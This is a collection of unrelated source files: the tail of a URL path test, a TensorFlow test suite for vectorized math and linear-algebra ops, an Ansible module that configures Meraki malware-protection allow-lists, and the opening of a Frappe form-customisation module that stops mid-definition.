self.assertEquals(str(self.path.child('baz').parent()), 'http://example.com/foo/')
self.assertEquals(str(self.path.parent().parent().parent().parent().parent()), 'http://example.com/')
def testHereString(self):
# here should be equivalent to '.'
self.assertEquals(str(self.path.here()), 'http://example.com/foo/')
self.assertEquals(str(self.path.child('').here()), 'http://example.com/foo/bar/')
|
|
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for vectorization of math kernels."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl.testing import parameterized
from tensorflow.python.eager import backprop
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops as framework_ops
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import clip_ops
from tensorflow.python.ops import linalg_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import nn
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import special_math_ops
from tensorflow.python.ops import tensor_array_grad # pylint: disable=unused-import
from tensorflow.python.ops.parallel_for.test_util import PForTestCase
from tensorflow.python.platform import test
@test_util.run_all_in_graph_and_eager_modes
class MathTest(PForTestCase, parameterized.TestCase):
def _test_unary_cwise_ops(self, ops, is_complex):
for op in ops:
with backprop.GradientTape(persistent=True) as g:
x = random_ops.random_uniform([3, 5])
g.watch(x)
if is_complex:
y = random_ops.random_uniform([3, 5])
g.watch(y)
x = math_ops.complex(x, y)
# pylint: disable=cell-var-from-loop
def loop_fn(i):
with g:
y = op(x)
x_i = array_ops.gather(x, i)
y_i = op(x_i)
outputs = [y_i]
# Build cross product of loop variant/invariant outputs and gradients.
for out in (y, y_i):
if out.dtype == dtypes.float32:
for output_gradients in (None, out * math_ops.cast(i, out.dtype)):
grad = g.gradient(out, x_i, output_gradients=output_gradients)
if grad is not None:
outputs.append(grad)
return outputs
# pylint: enable=cell-var-from-loop
self._test_loop_fn(loop_fn, 3)
def test_unary_cwise_complex_ops(self):
complex_ops = [
math_ops.angle,
math_ops.imag,
math_ops.complex_abs,
math_ops.real,
math_ops.conj,
]
self._test_unary_cwise_ops(complex_ops, True)
def test_unary_cwise_real_ops_1(self):
if test.is_built_with_rocm():
# TODO(rocm):
# This fails on ROCm...see JIRA ticket 236756
self.skipTest("Fails on ROCM")
real_ops = [
lambda x: math_ops.acosh(1 + math_ops.square(x)),
math_ops.abs,
math_ops.acos,
math_ops.asin,
math_ops.asinh,
math_ops.atan,
math_ops.atanh,
math_ops.cos,
math_ops.cosh,
math_ops.digamma,
math_ops.erf,
math_ops.erfc,
math_ops.erfinv,
math_ops.exp,
math_ops.expm1,
math_ops.inv,
math_ops.is_finite,
math_ops.is_inf,
math_ops.lgamma,
math_ops.log,
math_ops.log1p,
math_ops.ndtri,
special_math_ops.bessel_i0e,
special_math_ops.bessel_i1e,
]
self._test_unary_cwise_ops(real_ops, False)
def test_unary_cwise_real_ops_2(self):
real_ops = [
math_ops.neg,
math_ops.negative,
math_ops.reciprocal,
math_ops.rint,
math_ops.round,
math_ops.rsqrt,
math_ops.sigmoid,
math_ops.sign,
math_ops.sin,
math_ops.sinh,
math_ops.sqrt,
math_ops.square,
math_ops.tan,
math_ops.tanh,
nn.elu,
nn.relu,
nn.relu6,
lambda t: nn.leaky_relu(t, alpha=0.1),
nn.selu,
nn.softplus,
nn.softsign,
]
self._test_unary_cwise_ops(real_ops, False)
def test_unary_cwise_no_grad(self):
for op in [math_ops.ceil, math_ops.floor, math_ops.logical_not]:
x = random_ops.random_uniform([3, 5])
if op == math_ops.logical_not:
x = x > 0
# pylint: disable=cell-var-from-loop
def loop_fn(i):
return op(array_ops.gather(x, i))
# pylint: enable=cell-var-from-loop
self._test_loop_fn(loop_fn, 3)
def test_binary_cwise_ops(self):
# Enable tensor equality to test `equal` and `not_equal` ops below.
default_equality = framework_ops.Tensor._USE_EQUALITY
framework_ops.enable_tensor_equality()
try:
logical_ops = [
math_ops.logical_and, math_ops.logical_or, math_ops.logical_xor
]
# Wrapper functions restricting the range of inputs of zeta and polygamma.
def safe_polygamma(x, y):
return math_ops.polygamma(
math_ops.round(clip_ops.clip_by_value(y, 1, 10)), x * x + 1)
def safe_zeta(x, y):
return math_ops.zeta(x * x + 1, y * y)
float_ops = [
math_ops.add,
math_ops.add_v2,
math_ops.atan2,
math_ops.complex,
math_ops.div,
math_ops.divide,
math_ops.div_no_nan,
math_ops.equal,
lambda x, y: framework_ops.convert_to_tensor(x == y),
lambda x, y: framework_ops.convert_to_tensor(x != y),
math_ops.floor_mod,
math_ops.greater,
math_ops.greater_equal,
math_ops.igamma,
math_ops.igammac,
math_ops.igamma_grad_a,
math_ops.less,
math_ops.less_equal,
math_ops.maximum,
math_ops.minimum,
math_ops.mod,
math_ops.multiply,
math_ops.not_equal,
math_ops.pow,
math_ops.squared_difference,
math_ops.subtract,
math_ops.truncate_mod,
safe_polygamma,
]
# FloorDiv fails on XLA due floor's discontinuities exacerbating small
# division differences.
if not test_util.is_xla_enabled():
float_ops += [math_ops.floor_div]
# TODO(b/168912036): Re-enable once GPU + XLA issues for Zeta are
# resolved.
if not test_util.is_gpu_available():
float_ops += [safe_zeta]
for op in logical_ops + float_ops:
x = random_ops.random_uniform([7, 3, 5])
y = random_ops.random_uniform([3, 5])
if op in logical_ops:
x = x > 0
y = y > 0
output_dtypes = []
# pylint: disable=cell-var-from-loop
def loop_fn(i):
x1 = array_ops.gather(x, i)
y1 = array_ops.gather(y, i)
outputs = [op(x, y), op(x1, y), op(x, y1), op(x1, y1), op(x1, x1)]
del output_dtypes[:]
output_dtypes.extend(t.dtype for t in outputs)
return outputs
# pylint: enable=cell-var-from-loop
self._test_loop_fn(loop_fn, 3)
finally:
if not default_equality:
framework_ops.disable_tensor_equality()
def test_approximate_equal(self):
x = random_ops.random_uniform([3, 5])
y = random_ops.random_uniform([3, 5])
def loop_fn(i):
x1 = array_ops.gather(x, i)
y1 = array_ops.gather(y, i)
return math_ops.approximate_equal(x1, y1)
self._test_loop_fn(loop_fn, 3)
def test_addn(self):
x = random_ops.random_uniform([2, 3, 5])
y = random_ops.random_uniform([3, 5])
z = random_ops.random_uniform([3, 5])
def loop_fn(i):
x1 = array_ops.gather(x, i)
return math_ops.add_n([x1, y, z])
self._test_loop_fn(loop_fn, 2)
def test_cross(self):
x = random_ops.random_uniform([4, 2, 3])
y = random_ops.random_uniform([4, 2, 3])
def loop_fn(i):
x_i = array_ops.gather(x, i)
y_i = array_ops.gather(y, i)
x_0 = array_ops.gather(x, 0)
return math_ops.cross(x_i, y_i), math_ops.cross(x_0, y_i)
self._test_loop_fn(loop_fn, 4)
@test_util.run_without_tensor_float_32(
"Calls matmul in parallel for-loop and compares result to calling matmul "
"in sequential for-loop")
def test_matmul(self):
for tr_a in (True, False):
for tr_b in (True, False):
for stack_a in (True, False):
for stack_b in (True, False):
shape_a = (5, 3) if tr_a else (3, 5)
if stack_a:
shape_a = (2,) + shape_a
shape_b = (7, 5) if tr_b else (5, 7)
if stack_b:
shape_b = (2,) + shape_b
x = random_ops.random_uniform(shape_a)
y = random_ops.random_uniform(shape_b)
# pylint: disable=cell-var-from-loop
def loop_fn(i):
a = array_ops.gather(x, i) if stack_a else x
b = array_ops.gather(y, i) if stack_b else y
return math_ops.matmul(a, b, transpose_a=tr_a, transpose_b=tr_b)
# pylint: enable=cell-var-from-loop
self._test_loop_fn(loop_fn, 2)
def test_batch_matmul(self):
for tr_a in (True, False):
for tr_b in (True, False):
for stack_a in (True, False):
for stack_b in (True, False):
shape_a = (4, 5, 3) if tr_a else (4, 3, 5)
if stack_a:
shape_a = (2,) + shape_a
shape_b = (4, 7, 5) if tr_b else (4, 5, 7)
if stack_b:
shape_b = (2,) + shape_b
x = random_ops.random_uniform(shape_a)
y = random_ops.random_uniform(shape_b)
# pylint: disable=cell-var-from-loop
def loop_fn(i):
a = array_ops.gather(x, i) if stack_a else x
b = array_ops.gather(y, i) if stack_b else y
return math_ops.matmul(a, b, transpose_a=tr_a, transpose_b=tr_b)
# pylint: enable=cell-var-from-loop
self._test_loop_fn(loop_fn, 2)
def test_batch_matmul_broadcast(self):
for broadcast_a in (True, False):
for broadcast_b in (True, False):
for stack_a in (True, False):
for stack_b in (True, False):
shape_a = (2, 3, 5) if broadcast_a else (4, 2, 3, 5)
shape_b = (2, 5, 7) if broadcast_b else (4, 2, 5, 7)
shape_a = (2,) + shape_a if stack_a else shape_a
shape_b = (2,) + shape_b if stack_b else shape_b
x = random_ops.random_uniform(shape_a)
y = random_ops.random_uniform(shape_b)
# pylint: disable=cell-var-from-loop
def loop_fn(i):
a = array_ops.gather(x, i) if stack_a else x
b = array_ops.gather(y, i) if stack_b else y
return math_ops.matmul(a, b)
# pylint: enable=cell-var-from-loop
self._test_loop_fn(loop_fn, 2)
def test_reduction(self):
x = random_ops.random_uniform([2, 3, 4, 5])
for op in [
math_ops.reduce_sum,
math_ops.reduce_prod,
math_ops.reduce_max,
math_ops.reduce_min,
math_ops.reduce_mean,
]:
for axis in ([1], None, [0, 2], constant_op.constant([1], dtypes.int64)):
for keepdims in (True, False):
# pylint: disable=cell-var-from-loop
def loop_fn(i):
a = array_ops.gather(x, i)
return op(a, axis=axis, keepdims=keepdims)
# pylint: enable=cell-var-from-loop
self._test_loop_fn(loop_fn, 2)
def test_boolean_reduction(self):
x = random_ops.random_uniform([2, 3, 4, 5]) > 0.5
for op in [math_ops.reduce_any, math_ops.reduce_all]:
for axis in ([1], None, [0, 2], constant_op.constant([1], dtypes.int64)):
for keepdims in (True, False):
# pylint: disable=cell-var-from-loop
def loop_fn(i):
a = array_ops.gather(x, i)
return op(a, axis=axis, keepdims=keepdims)
# pylint: enable=cell-var-from-loop
self._test_loop_fn(loop_fn, 2)
def test_argmin_argmax(self):
x = random_ops.random_uniform([2, 3, 4, 5])
for op in [math_ops.argmin, math_ops.argmax]:
for axis in (1, None, -1):
for output_dtype in (dtypes.int32, dtypes.int64, None):
# pylint: disable=cell-var-from-loop
def loop_fn(i):
a = array_ops.gather(x, i)
return op(a, axis=axis, output_type=output_dtype)
# pylint: enable=cell-var-from-loop
self._test_loop_fn(loop_fn, 2)
def test_bucketize(self):
x = random_ops.random_uniform([2, 3, 4])
def loop_fn(i):
a = array_ops.gather(x, i)
return math_ops.bucketize(a, [-1, 0.5, 1])
self._test_loop_fn(loop_fn, 2)
def test_clip_by_value(self):
x = random_ops.random_uniform([2, 3, 4])
def loop_fn(i):
a = array_ops.gather(x, i)
return clip_ops.clip_by_value(a, 0.5, 1.0)
self._test_loop_fn(loop_fn, 2)
def test_cum_sum(self):
x = random_ops.random_uniform([2, 3, 4, 5])
for axis in (1, -2, constant_op.constant(1, dtypes.int64)):
for exclusive in (True, False):
for reverse in (True, False):
# pylint: disable=cell-var-from-loop
def loop_fn(i):
a = array_ops.gather(x, i)
return math_ops.cumsum(
a, axis=axis, exclusive=exclusive, reverse=reverse)
# pylint: enable=cell-var-from-loop
self._test_loop_fn(loop_fn, 2)
def test_cum_prod(self):
x = random_ops.random_uniform([2, 3, 4, 5])
for axis in (1, -2, constant_op.constant(1, dtypes.int64)):
for exclusive in (True, False):
for reverse in (True, False):
# pylint: disable=cell-var-from-loop
def loop_fn(i):
a = array_ops.gather(x, i)
return math_ops.cumprod(
a, axis=axis, exclusive=exclusive, reverse=reverse)
# pylint: enable=cell-var-from-loop
self._test_loop_fn(loop_fn, 2)
def test_bias_add(self):
for data_format in ("NCHW", "NHWC"):
for stacked_value in (True, False):
x_shape = [3, 4, 5, 6]
if stacked_value:
x_shape = [2] + x_shape
x = random_ops.random_uniform(x_shape)
for stacked_bias in (True, False):
if not (stacked_value or stacked_bias):
continue
with backprop.GradientTape(persistent=True) as g:
bias_dim = -1
if data_format == "NCHW":
bias_dim = 2 if stacked_value else 1
bias_shape = [x_shape[bias_dim]]
if stacked_bias:
bias_shape = [2] + bias_shape
bias = random_ops.random_uniform(bias_shape)
g.watch(bias)
# pylint: disable=cell-var-from-loop
def loop_fn(i):
with g:
a = array_ops.gather(x, i) if stacked_value else x
b = array_ops.gather(bias, i) if stacked_bias else bias
y = nn.bias_add(a, b, data_format=data_format)
loss = math_ops.reduce_sum(y * y)
grad = g.gradient(loss, bias)
if stacked_bias:
# If we gather over bias in loop_fn, the gradient will be an
# instance of `IndexedSlices` with attrs `values` and `indices`.
return y, grad.values, grad.indices
else:
return y, grad
# pylint: enable=cell-var-from-loop
out_dtypes = [dtypes.float32, dtypes.float32]
if stacked_bias:
out_dtypes = out_dtypes + [dtypes.int32]
self._test_loop_fn(loop_fn, 2)
@parameterized.parameters(
(math_ops.unsorted_segment_sum,), (math_ops.unsorted_segment_min,),
(math_ops.unsorted_segment_max,), (math_ops.unsorted_segment_prod,))
def test_unsorted_segment_reduction(self, reduction_op):
t = random_ops.random_uniform([3, 3, 2])
for segment_ids_dtype in (dtypes.int32, dtypes.int64):
for num_segments_dtype in (dtypes.int32, dtypes.int64):
segment_ids = constant_op.constant([[0, 0, 2], [0, 1, 2], [2, 2, 2]],
dtype=segment_ids_dtype)
num_segments = constant_op.constant(3, dtype=num_segments_dtype)
# pylint: disable=cell-var-from-loop
def loop_fn(i):
data = array_ops.gather(t, i)
data_0 = array_ops.gather(t, 0)
seg_ids = array_ops.gather(segment_ids, i)
seg_ids_0 = array_ops.gather(segment_ids, 0)
return (reduction_op(data, seg_ids, num_segments),
reduction_op(data_0, seg_ids, num_segments),
reduction_op(data, seg_ids_0, num_segments))
# pylint: enable=cell-var-from-loop
self._test_loop_fn(loop_fn, 3)
@parameterized.parameters((math_ops.sparse_segment_sum_v2, True),
(math_ops.sparse_segment_mean_v2, True),
(math_ops.sparse_segment_sqrt_n_v2, True),
(math_ops.sparse_segment_sum_v2, False),
(math_ops.sparse_segment_mean_v2, False),
(math_ops.sparse_segment_sqrt_n_v2, False))
def test_sparse_segment(self, op_func, with_num_segments):
data = random_ops.random_uniform([3, 4, 2])
indices = constant_op.constant([[1, 2, 3], [0, 1, 2], [0, 2, 3]])
seg_ids = constant_op.constant([[0, 0, 2], [1, 1, 1], [0, 1, 1]])
if with_num_segments:
num_segments = 3
else:
num_segments = None
def loop_fn(i):
data_i = array_ops.gather(data, i)
data_0 = array_ops.gather(data, 0)
indices_i = array_ops.gather(indices, i)
indices_0 = array_ops.gather(indices, 0)
seg_ids_i = array_ops.gather(seg_ids, i)
seg_ids_0 = array_ops.gather(seg_ids, 0)
outputs = [
op_func(data_0, indices_i, seg_ids_0, num_segments=num_segments),
op_func(data_i, indices_i, seg_ids_0, num_segments=num_segments),
op_func(data_0, indices_0, seg_ids_0, num_segments=num_segments),
op_func(data_i, indices_0, seg_ids_0, num_segments=num_segments)
]
if with_num_segments:
# For this case, we support loop variant segment_ids as well.
outputs += [
op_func(data_0, indices_i, seg_ids_i, num_segments=num_segments),
op_func(data_i, indices_i, seg_ids_i, num_segments=num_segments),
op_func(data_0, indices_0, seg_ids_i, num_segments=num_segments),
op_func(data_i, indices_0, seg_ids_i, num_segments=num_segments)
]
return outputs
self._test_loop_fn(loop_fn, 3)
@parameterized.parameters(math_ops.sparse_segment_mean_grad,
math_ops.sparse_segment_sqrt_n_grad)
def test_sparse_segment_grad(self, op_func):
grad = random_ops.random_uniform([3, 3, 2])
indices = constant_op.constant([1, 2, 3])
seg_ids = constant_op.constant([0, 0, 2])
dim0 = 4
def loop_fn(i):
grad_i = array_ops.gather(grad, i)
return op_func(grad_i, indices, seg_ids, dim0)
self._test_loop_fn(loop_fn, 3)
def test_cast(self):
x = constant_op.constant([[1], [2]])
y = constant_op.constant([[1.0], [2.0]])
def loop_fn(i):
return (math_ops.cast(array_ops.gather(x, i), dtypes.float32),
math_ops.cast(array_ops.gather(y, i), dtypes.int32))
self._test_loop_fn(loop_fn, 2)
def test_tanh_axpy(self):
a = constant_op.constant(3.)
x = random_ops.random_uniform([4, 5])
y = random_ops.random_uniform([6, 5])
n = x.shape[0]
def loop_fn(i):
return math_ops.tanh(a * array_ops.gather(x, i) + array_ops.gather(y, i))
self._test_loop_fn(loop_fn, n)
def test_select(self):
a = random_ops.random_uniform([2, 3, 5])
b = random_ops.random_uniform([2, 3, 5])
for cond_shape in [2], [2, 3], [2, 3, 5]:
cond = random_ops.random_uniform(cond_shape) > 0.5
# pylint: disable=cell-var-from-loop
def loop_fn(i):
a_i = array_ops.gather(a, i)
b_i = array_ops.gather(b, i)
cond_i = array_ops.gather(cond, i)
return array_ops.where(cond_i, a_i, b_i)
# pylint: enable=cell-var-from-loop
self._test_loop_fn(loop_fn, 2)
def test_selectv2_cond_needs_broadcast(self):
a = random_ops.random_uniform([2, 3, 5])
b = random_ops.random_uniform([2, 3, 5])
# wherev2 assumes all shapes are broadcastable with each other.
# This means that we can only specify conditions that are
# broadcastable with [3, 5].
for cond_shape in [2], [2, 1], [2, 5], [2, 3, 1], [2, 3, 5]:
cond = random_ops.random_uniform(cond_shape) > 0.5
# pylint: disable=cell-var-from-loop
def loop_fn(i):
a_i = array_ops.gather(a, i)
b_i = array_ops.gather(b, i)
cond_i = array_ops.gather(cond, i)
return array_ops.where_v2(cond_i, a_i, b_i)
# pylint: enable=cell-var-from-loop
self._test_loop_fn(loop_fn, 2)
def test_selectv2_args_need_broadcast(self):
a = random_ops.random_uniform([2, 5])
b = random_ops.random_uniform([2, 3, 5])
# wherev2 assumes all shapes are broadcastable with each other.
# This means that we can only specify conditions that are
# broadcastable with [3, 5].
for cond_shape in [2], [2, 1], [2, 5], [2, 3, 1], [2, 3, 5]:
cond = random_ops.random_uniform(cond_shape) > 0.5
# pylint: disable=cell-var-from-loop
def loop_fn(i):
a_i = array_ops.gather(a, i)
b_i = array_ops.gather(b, i)
cond_i = array_ops.gather(cond, i)
return array_ops.where_v2(cond_i, a_i, b_i)
# pylint: enable=cell-var-from-loop
self._test_loop_fn(loop_fn, 2)
def test_selectv2_cond_fixed(self):
cond = random_ops.random_uniform([3, 5]) > 0.5
b = random_ops.random_uniform([2, 3, 5])
# wherev2 assumes all shapes are broadcastable with each other.
# This means that we can only specify conditions that are
# broadcastable with [3, 5].
for a_shape in [2], [2, 1], [2, 5], [2, 3, 1], [2, 3, 5]:
a = random_ops.random_uniform(a_shape)
# pylint: disable=cell-var-from-loop
def loop_fn(i):
a_i = array_ops.gather(a, i)
b_i = array_ops.gather(b, i)
return array_ops.where_v2(cond, a_i, b_i)
# pylint: enable=cell-var-from-loop
self._test_loop_fn(loop_fn, 2)
@test_util.run_all_in_graph_and_eager_modes
class LinalgTest(PForTestCase):
def test_cholesky(self):
z = random_ops.random_normal([2, 3, 3])
x = (
math_ops.matmul(z, array_ops.matrix_transpose(z)) # Ensure pos. def.
+ linalg_ops.eye(3)) # Ensure well-conditioned.
def loop_fn(i):
return linalg_ops.cholesky(array_ops.gather(x, i))
self._test_loop_fn(loop_fn, 2)
def test_log_matrix_determinant(self):
for x_shape in ([3, 4, 2, 2], [3, 2, 2]):
x = random_ops.random_normal(x_shape)
# pylint: disable=cell-var-from-loop
def loop_fn(i):
return linalg_ops.log_matrix_determinant(array_ops.gather(x, i))
# pylint: enable=cell-var-from-loop
self._test_loop_fn(loop_fn, 3)
def test_matrix_inverse(self):
x = (random_ops.random_uniform([3, 4, 2, 2]) +
10 * linalg_ops.eye(2)) # Ensure well-conditioned.
for adjoint in (True, False):
# pylint: disable=cell-var-from-loop
def loop_fn(i):
return linalg_ops.matrix_inverse(array_ops.gather(x, i),
adjoint=adjoint)
# pylint: enable=cell-var-from-loop
self._test_loop_fn(loop_fn, 2)
def test_matrix_solve(self):
for adjoint in (True, False):
for stack_a in (True, False):
for stack_b in (True, False):
shape_a = (2, 4, 3, 3) if stack_a else (4, 3, 3)
shape_b = (2, 4, 3, 5) if stack_b else (4, 3, 5)
x = (random_ops.random_uniform(shape_a) +
10 * linalg_ops.eye(3)) # Ensure well-conditioned.
y = random_ops.random_uniform(shape_b)
# pylint: disable=cell-var-from-loop
def loop_fn(i):
a = array_ops.gather(x, i) if stack_a else x
b = array_ops.gather(y, i) if stack_b else y
return linalg_ops.matrix_solve(a, b, adjoint=adjoint)
# pylint: enable=cell-var-from-loop
self._test_loop_fn(loop_fn, 2)
def test_matrix_triangular_solve(self):
for lower in (True, False):
for adjoint in (True, False):
for stack_a in (True, False):
for stack_b in (True, False):
shape_a = (2, 4, 3, 3) if stack_a else (4, 3, 3)
shape_b = (2, 4, 3, 5) if stack_b else (4, 3, 5)
x = array_ops.matrix_band_part(
random_ops.random_uniform(shape_a) +
linalg_ops.eye(3), # Ensure well-conditioned.
*((-1, 0) if lower else (0, -1))) # Ensure triangular.
y = random_ops.random_uniform(shape_b)
# pylint: disable=cell-var-from-loop
def loop_fn(i):
a = array_ops.gather(x, i) if stack_a else x
b = array_ops.gather(y, i) if stack_b else y
return linalg_ops.matrix_triangular_solve(
a, b, lower=lower, adjoint=adjoint)
# pylint: enable=cell-var-from-loop
self._test_loop_fn(loop_fn, 2)
def test_self_adjoint_eig(self):
z = random_ops.random_normal([2, 3, 3])
x = z + array_ops.matrix_transpose(z) # Ensure self-adjoint.
def loop_fn(i):
return (linalg_ops.self_adjoint_eig(array_ops.gather(x, i)),
linalg_ops.self_adjoint_eigvals(array_ops.gather(x, i)))
self._test_loop_fn(loop_fn, 2)
@test_util.run_without_tensor_float_32(
"Calls einsum in parallel for-loop and compares result to calling einsum "
"in sequential for-loop")
def test_einsum(self):
b = 10
x_series = random_ops.random_uniform([b, 9, 9])
y_series = random_ops.random_uniform([b, 9, 1])
def loop_fn(i):
x = array_ops.gather(x_series, 0) # invariant.
y = array_ops.gather(y_series, 0) # invariant.
x_i = array_ops.gather(x_series, i)
y_i = array_ops.gather(y_series, i)
z1 = special_math_ops.einsum("ab,bc->ac", x_i, y)
z2 = special_math_ops.einsum("ab,bc->ac", x, y_i)
z3 = special_math_ops.einsum("ab,bc->ac", x, y)
z4 = special_math_ops.einsum("ab,bc->ac", x_i, y_i)
z5 = special_math_ops.einsum("cd,ce->de", y_i, x_i) # Includes transpose.
outputs = [z1, z2, z3, z4, z5]
return outputs
self._test_loop_fn(loop_fn, b)
if __name__ == "__main__":
test.main()
|
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2019, Kevin Breit (@kbreit) <[email protected]>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {
'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'
}
DOCUMENTATION = r'''
---
module: meraki_malware
short_description: Manage Malware Protection in the Meraki cloud
version_added: "2.9"
description:
- Fully configure malware protection in a Meraki environment.
notes:
- Some of the options are likely only used for developers within Meraki.
options:
state:
description:
- Specifies whether object should be queried, created/modified, or removed.
choices: [absent, present, query]
default: query
type: str
net_name:
description:
- Name of network which configuration is applied to.
aliases: [network]
type: str
net_id:
description:
- ID of network which configuration is applied to.
type: str
allowed_urls:
description:
- List of URLs to whitelist.
suboptions:
url:
description:
- URL string to allow.
type: str
comment:
description:
- Human readable information about URL.
type: str
allowed_files:
description:
- List of files to whitelist.
suboptions:
sha256:
description:
- 256-bit hash of file.
type: str
aliases: [ hash ]
comment:
description:
- Human readable information about file.
type: str
mode:
description:
- Enabled or disabled state of malware protection.
choices: [disabled, enabled]
author:
- Kevin Breit (@kbreit)
extends_documentation_fragment: meraki
'''
EXAMPLES = r'''
- name: Enable malware protection
meraki_malware:
auth_key: abc123
state: present
org_name: YourOrg
net_name: YourNet
mode: enabled
delegate_to: localhost
- name: Set whitelisted url
meraki_malware:
auth_key: abc123
state: present
org_name: YourOrg
net_name: YourNet
mode: enabled
allowed_urls:
- url: www.google.com
comment: Google
delegate_to: localhost
- name: Set whitelisted file
meraki_malware:
auth_key: abc123
state: present
org_name: YourOrg
net_name: YourNet
mode: enabled
allowed_files:
- sha256: e82c5f7d75004727e1f3b94426b9a11c8bc4c312a9170ac9a73abace40aef503
comment: random zip
delegate_to: localhost
- name: Get malware settings
meraki_malware:
auth_key: abc123
state: query
org_name: YourNet
net_name: YourOrg
delegate_to: localhost
'''
RETURN = r'''
data:
description: List of administrators.
returned: success
type: complex
contains:
mode:
description: Mode to enable or disable malware scanning.
returned: success
type: str
sample: enabled
allowed_files:
description: List of files which are whitelisted.
returned: success
type: complex
contains:
sha256:
description: sha256 hash of whitelisted file.
returned: success
type: str
sample: e82c5f7d75004727e1f3b94426b9a11c8bc4c312a9170ac9a73abace40aef503
comment:
description: Comment about the whitelisted entity
returned: success
type: str
sample: TPS report
allowed_urls:
description: List of URLs which are whitelisted.
returned: success
type: complex
contains:
url:
description: URL of whitelisted site.
returned: success
type: str
sample: site.com
comment:
description: Comment about the whitelisted entity
returned: success
type: str
sample: Corporate HQ
'''
import os
from ansible.module_utils.basic import AnsibleModule, json, env_fallback
from ansible.module_utils._text import to_native
from ansible.module_utils.common.dict_transformations import recursive_diff
from ansible.module_utils.network.meraki.meraki import MerakiModule, meraki_argument_spec
def main():
# define the available arguments/parameters that a user can pass to
# the module
urls_arg_spec = dict(url=dict(type='str'),
comment=dict(type='str'),
)
files_arg_spec = dict(sha256=dict(type='str', aliases=['hash']),
comment=dict(type='str'),
)
argument_spec = meraki_argument_spec()
argument_spec.update(state=dict(type='str', choices=['absent', 'present', 'query'], default='query'),
net_name=dict(type='str', aliases=['network']),
net_id=dict(type='str'),
mode=dict(type='str', choices=['enabled', 'disabled']),
allowed_urls=dict(type='list', default=None, elements='dict', options=urls_arg_spec),
allowed_files=dict(type='list', default=None, elements='dict', options=files_arg_spec),
)
# seed the result dict in the object
# we primarily care about changed and state
# change is if this module effectively modified the target
# state will include any data that you want your module to pass back
# for consumption, for example, in a subsequent task
result = dict(
changed=False,
)
# the AnsibleModule object will be our abstraction working with Ansible
# this includes instantiation, a couple of common attr would be the
# args/params passed to the execution, as well as if the module
# supports check mode
module = AnsibleModule(argument_spec=argument_spec,
supports_check_mode=True,
)
meraki = MerakiModule(module, function='malware')
meraki.params['follow_redirects'] = 'all'
query_url = {'malware': '/networks/{net_id}/security/malwareSettings'}
update_url = {'malware': '/networks/{net_id}/security/malwareSettings'}
meraki.url_catalog['get_one'].update(query_url)
meraki.url_catalog['update'] = update_url
org_id = meraki.params['org_id']
if org_id is None:
org_id = meraki.get_org_id(meraki.params['org_name'])
net_id = meraki.params['net_id']
if net_id is None:
nets = meraki.get_nets(org_id=org_id)
net_id = meraki.get_net_id(net_name=meraki.params['net_name'], data=nets)
# Check for argument completeness
if meraki.params['state'] == 'present':
if meraki.params['allowed_files'] is not None or meraki.params['allowed_urls'] is not None:
if meraki.params['mode'] is None:
meraki.fail_json(msg="mode must be set when allowed_files or allowed_urls is set.")
# Assemble payload
if meraki.params['state'] == 'present':
payload = dict()
if meraki.params['mode'] is not None:
payload['mode'] = meraki.params['mode']
if meraki.params['allowed_urls'] is not None:
payload['allowedUrls'] = meraki.params['allowed_urls']
if meraki.params['allowed_files'] is not None:
payload['allowedFiles'] = meraki.params['allowed_files']
if meraki.params['state'] == 'query':
path = meraki.construct_path('get_one', net_id=net_id)
data = meraki.request(path, method='GET')
if meraki.status == 200:
meraki.result['data'] = data
elif meraki.params['state'] == 'present':
path = meraki.construct_path('get_one', net_id=net_id)
original = meraki.request(path, method='GET')
if meraki.is_update_required(original, payload):
if meraki.module.check_mode is True:
diff = recursive_diff(original, payload)
original.update(payload)
meraki.result['diff'] = {'before': diff[0],
'after': diff[1],
}
meraki.result['data'] = original
meraki.result['changed'] = True
meraki.exit_json(**meraki.result)
path = meraki.construct_path('update', net_id=net_id)
data = meraki.request(path, method='PUT', payload=json.dumps(payload))
if meraki.status == 200:
diff = recursive_diff(original, payload)
meraki.result['diff'] = {'before': diff[0],
'after': diff[1],
}
meraki.result['data'] = data
meraki.result['changed'] = True
else:
meraki.result['data'] = original
# in the event of a successful module execution, you will want to
# simple AnsibleModule.exit_json(), passing the key/value results
meraki.exit_json(**meraki.result)
if __name__ == '__main__':
main()
|
|
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals
"""
Customize Form is a Single DocType used to mask the Property Setter
Thus providing a better UI from user perspective
"""
import frappe
import frappe.translate
from frappe import _
from frappe.utils import cint
from frappe.model.document import Document
from frappe.model import no_value_fields
from frappe.core.doctype.doctype.doctype import validate_fields_for_doctype
doctype_properties = {
'search_fields': 'Data',
'title_field': 'Data',
'image_field': 'Data',
'sort_field': 'Data',
'sort_order': 'Data',
'default_print_format': 'Data',
'read_only_onload': 'Check',
'allow_copy': 'Check',
'istable': 'Check',
'quick_entry': 'Check',
'editable_grid': 'Check',
'max_attachments': 'Int',
'image_view': 'Check',
'track_changes': 'Check',
}
docfield_properties = {
'idx': 'Int',
'label': 'Data',
'fieldtype': 'Select',
'options': 'Text',
'permlevel': 'Int',
'width': 'Data',
'print_width': 'Data',
'reqd': 'Check',
'unique': 'Check',
'ignore_user_permissions': 'Check',
'in_list_view': 'Check',
'in_standard_filter': 'Check',
'in_global_search': 'Check',
'bold': 'Check',
'hidden': 'Check',
'collapsible': 'Check',
'collapsible_depends_on': 'Data',
'print_hide': 'Check',
'print_hide_if_no_value': 'Check',
'report_hide': 'Check',
'allow_on_submit': 'Check',
'depends_on': 'Data',
'description': 'Text',
